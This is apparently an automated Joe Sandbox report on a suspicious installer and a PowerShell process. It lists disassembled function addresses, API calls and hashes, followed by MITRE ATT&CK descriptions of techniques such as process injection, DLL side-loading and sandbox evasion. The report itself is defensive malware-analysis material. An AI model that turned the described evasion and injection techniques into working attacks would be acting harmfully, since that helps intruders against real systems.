Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: powershell.exePID: 8188, Parent PID: 7716COMMON

Executed Functions

Function 076E1A68 Relevance: 5.6, Strings: 4, Instructions: 580COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076E1DA6
4'^q, xrefs: 076E1DB0
4'^q, xrefs: 076E1F0A
4'^q, xrefs: 076E1F00

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 21b613319adf051aa1ebf44571a8fb0676152193ad2f46893cde4d8a7e1ccd07
Instruction ID: 3526473aea7c35f9061f427ca831e98ee409a4271584914221546660e2b685f9
Opcode Fuzzy Hash: 21b613319adf051aa1ebf44571a8fb0676152193ad2f46893cde4d8a7e1ccd07
Instruction Fuzzy Hash: B9125AB17052198FD7299B78881076A7FAAAFC7210F14807AD547DF395DE35C882CBB1

Function 02FB5E10 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504608afac522af80af0bc2ae31f1989aa03cb98059bc340c823129334979c50
Instruction ID: c4ceecabff364daa916983dd86232013ac812d5af14e7e1e19a2b47378012a49
Opcode Fuzzy Hash: 504608afac522af80af0bc2ae31f1989aa03cb98059bc340c823129334979c50
Instruction Fuzzy Hash: 51423474A002099FCB05CF99C484AAEFBB6FF88354F248569E915EB365C735EC81CB90

Function 02FB2F58 Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5fd805fb2b787cff7bf3cd5b9cb52d88694e2adac1349ff6f379cd9d3cc5c9
Instruction ID: d6d21ecb5b8a06b587fd87254819ff6ce1bcdb240374fabfd3550a760f98ffa7
Opcode Fuzzy Hash: 0a5fd805fb2b787cff7bf3cd5b9cb52d88694e2adac1349ff6f379cd9d3cc5c9
Instruction Fuzzy Hash: 99228E70E042499FCB06CF99C894AEEBBB1FF49350F18819AE545AB365C735ED81CB90

Function 076E1A62 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df034bad981ed6b508f3dfc88c9f8bde71cc3cd096320e41acf9dc7658df7499
Instruction ID: b3d0bc3622f62bc5a15667d21471b034132bc21c84137e301e4621c84a897a97
Opcode Fuzzy Hash: df034bad981ed6b508f3dfc88c9f8bde71cc3cd096320e41acf9dc7658df7499
Instruction Fuzzy Hash: FC312BF1B1220DCBDB2C8E348545B6D7BAAAB82754F1480A9D802DF351E735D882DFB1

Function 02FB33D0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd91603201164b521484f933735911307f6c6583519bad37ad43934bde291ca0
Instruction ID: 11120fd21ac93a43f0aa99f46c6c1276b677ffc1c0f9e1530292f511da343723
Opcode Fuzzy Hash: cd91603201164b521484f933735911307f6c6583519bad37ad43934bde291ca0
Instruction Fuzzy Hash: 794148B4A401059FCB0ACF99C594AEAFBB1FF48310B258199D905AB364C736FD51CFA0

Function 02FB2A90 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6646d1e39997aceaf5ce20cb3650d34e383517d7907d86b0965d34cf5418875
Instruction ID: 53263b613eca876f124e648183596369128cdde26891b3ba5e4a013948b8608c
Opcode Fuzzy Hash: d6646d1e39997aceaf5ce20cb3650d34e383517d7907d86b0965d34cf5418875
Instruction Fuzzy Hash: EE3191B5A042159FCB01CF69C8909AEFBB1FF49310B14819AD949EB352C735EC42CFA0

Function 02FB2A80 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f3c02ec5b8def106497ba829afb2271d57b2a087df496e0b229cc3c1a64eecb
Instruction ID: ae8ee1956697739345a73fe05ba97d506356ba271deda4b7413a676a32c35f6d
Opcode Fuzzy Hash: 8f3c02ec5b8def106497ba829afb2271d57b2a087df496e0b229cc3c1a64eecb
Instruction Fuzzy Hash: 1D211974A00615DFCB05CF99C5809AEFBB1FF48310B248599E949EB361C731EC91CBA0

Function 02FB48B1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05524e31a0ad148d9aedf9996f8776089bc5c581ed147e2ee8108e09201fc976
Instruction ID: 4ebd47dec35d4f4a71d240fe91e1b767983dd1b9257ffaa641c2bafea6a028af
Opcode Fuzzy Hash: 05524e31a0ad148d9aedf9996f8776089bc5c581ed147e2ee8108e09201fc976
Instruction Fuzzy Hash: 42213174A052599FCB06CB68C9909AABFF1FF4A300B1581DAD545EB363C335EC45CBA1

Function 02FB48E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d49c11ce49ed8b09fa98c6791a21f9e21db2c09cf0037c268cc34fd769400dd
Instruction ID: bfa063e6609230747db21af70490321ebb1545247f2aaf2418836b3f5fea086d
Opcode Fuzzy Hash: 0d49c11ce49ed8b09fa98c6791a21f9e21db2c09cf0037c268cc34fd769400dd
Instruction Fuzzy Hash: 1A214974A042198FCB01CF99C5909AABBF1FF89300B148599E955EB352C731EC41CBA1

Function 02EAD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2313419373.0000000002EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ead000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178bc0dd0c243710ba0995ef741336b8156146c08f4fe0f532bc105ec0f04285
Instruction ID: f1a0043e0935717d41f96ee0add45c2cca48c641273dbdcd9998d3b49eee0f49
Opcode Fuzzy Hash: 178bc0dd0c243710ba0995ef741336b8156146c08f4fe0f532bc105ec0f04285
Instruction Fuzzy Hash: B001526100E7C05FD7128B258C94756BFB4EF53628F1DC4DBD8888F5A3C2699849C772

Function 02EAD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2313419373.0000000002EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ead000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4543110481a608d8f4451f26505ba888cf06dd9acf8c0ceb2cc89680e0b96b5
Instruction ID: e55b7a95beeedf1c023990b1fc58de7778eb3baf1da7b9e85c5133ebef9dac6f
Opcode Fuzzy Hash: f4543110481a608d8f4451f26505ba888cf06dd9acf8c0ceb2cc89680e0b96b5
Instruction Fuzzy Hash: 5F0126710497409EE7208B29CDC4BA7BFD8EF41728F18C46AEC494F646C3B9E841C6B1

Function 02FB5115 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2314106098.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c088813162d17ed3ea1799998dc77d1442e5678e173bdc647a5ba7e99dc4fc
Instruction ID: 7d1261e8560f6ed6ce76497360b4fbb6abfbec6e1e3f53b2e7e31dc228d6ed13
Opcode Fuzzy Hash: 64c088813162d17ed3ea1799998dc77d1442e5678e173bdc647a5ba7e99dc4fc
Instruction Fuzzy Hash: 89F04978A002049FC700CB58D994EAAF7B5FF8C310B208098D90A97361C736EC43CB90

Non-executed Functions

Function 076E08A0 Relevance: 9.1, Strings: 7, Instructions: 313COMMON

Download Yara Rule

Strings

$^q, xrefs: 076E0AA8
$^q, xrefs: 076E0AB4
4'^q, xrefs: 076E09A2
$^q, xrefs: 076E0A82
4'^q, xrefs: 076E09AE
tP^q, xrefs: 076E0AED
tP^q, xrefs: 076E0AF9

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 7d08da04f7570691cc40db356846e06d0d168d455b7a5c77927cb3e80f7f6f94
Instruction ID: fcc71c2b3f23aec2363864f6d13708a532f020a36d401b457314e63f19eafd25
Opcode Fuzzy Hash: 7d08da04f7570691cc40db356846e06d0d168d455b7a5c77927cb3e80f7f6f94
Instruction Fuzzy Hash: DEA15BB17053568FD7254A78941076ABBEAAFC5210F2484BBD446CF392DAB2CC45C7B1

Function 076E1798 Relevance: 9.0, Strings: 7, Instructions: 240COMMON

Download Yara Rule

Strings

$^q, xrefs: 076E17AA
tP^q, xrefs: 076E1815
4'^q, xrefs: 076E1999
4'^q, xrefs: 076E19A5
$^q, xrefs: 076E17DC
tP^q, xrefs: 076E1821
$^q, xrefs: 076E17D0

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 69463a98b43b9fd599885ff66e20a0c6417aa955a5c417836e3c0936611fd39b
Instruction ID: d72b51bc0f4e7ad268a670aad8c188824de7a569722e908114ec82a4fb155f9c
Opcode Fuzzy Hash: 69463a98b43b9fd599885ff66e20a0c6417aa955a5c417836e3c0936611fd39b
Instruction Fuzzy Hash: 9F815BB17052098FC7298B78C410666BFFAAF87620F1480AAD446CF361DA31CD46C7A1

Function 076E14E8 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

$^q, xrefs: 076E169A
4'^q, xrefs: 076E159E
$^q, xrefs: 076E16A6
4'^q, xrefs: 076E1592
$^q, xrefs: 076E166F

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 1254b6424a22bc801a34f678cc7ca67c1691565795fc99f5f2b27a698e65aae6
Instruction ID: 9fb5b892f795079dcee8a1a0b3e3b94873995ddb146086f3e67545a631beac75
Opcode Fuzzy Hash: 1254b6424a22bc801a34f678cc7ca67c1691565795fc99f5f2b27a698e65aae6
Instruction Fuzzy Hash: 1B5126F170620A8FCB295B798410766BBAEAFC7210F18806BD447DB355DA31C986DB71

Function 076E34F8 Relevance: 5.1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

Strings

$^q, xrefs: 076E3546
$^q, xrefs: 076E3574
$^q, xrefs: 076E352A
$^q, xrefs: 076E3580

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 6a6f3a2cff162da9f966be84cc9f18b7e4e884b81aff840e6b20b4e07a09dc32
Instruction ID: 90aa938746d6ae245bb8e9ddaf14a791b3e129df7ac13d6f75d27240b98f3bd0
Opcode Fuzzy Hash: 6a6f3a2cff162da9f966be84cc9f18b7e4e884b81aff840e6b20b4e07a09dc32
Instruction Fuzzy Hash: 673178B13093456FD729563A9C54B636FAE4FC2324F28846BE446CF396DD25C805C730

Function 076E3518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 076E3546
$^q, xrefs: 076E3574
$^q, xrefs: 076E352A
$^q, xrefs: 076E3580

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: de7f38e3c5b890071bc177c22112cfa0d971c7f59d2dd3b804ea3bbb1bf859cc
Instruction ID: 931007431291375d15deb85ef696248080d62055bae76fcbc6cb64e3f6e7d9d1
Opcode Fuzzy Hash: de7f38e3c5b890071bc177c22112cfa0d971c7f59d2dd3b804ea3bbb1bf859cc
Instruction Fuzzy Hash: BF2144B13113066BEB38593B9804B37AEDE9BC1714F24883AA40BCF385DE36D8458771

Function 076E0570 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$^q, xrefs: 076E05C6
$^q, xrefs: 076E05BA
4'^q, xrefs: 076E05DB
4'^q, xrefs: 076E05E7

Memory Dump Source

Source File: 00000011.00000002.2322378377.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 5820d9fcef9efa75e960bcb371ad67803ec462b3b58a394289d7c9b64e9e85ee
Instruction ID: 366a364e679c0b9922a314f224c673287579eb07b74e1434b5f03535e5e62e00
Opcode Fuzzy Hash: 5820d9fcef9efa75e960bcb371ad67803ec462b3b58a394289d7c9b64e9e85ee
Instruction Fuzzy Hash: 6201F761B4E3C54FC72B02381D3052A5FB61B9351072A05DBC042DF3ABCD99CC4987A3

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
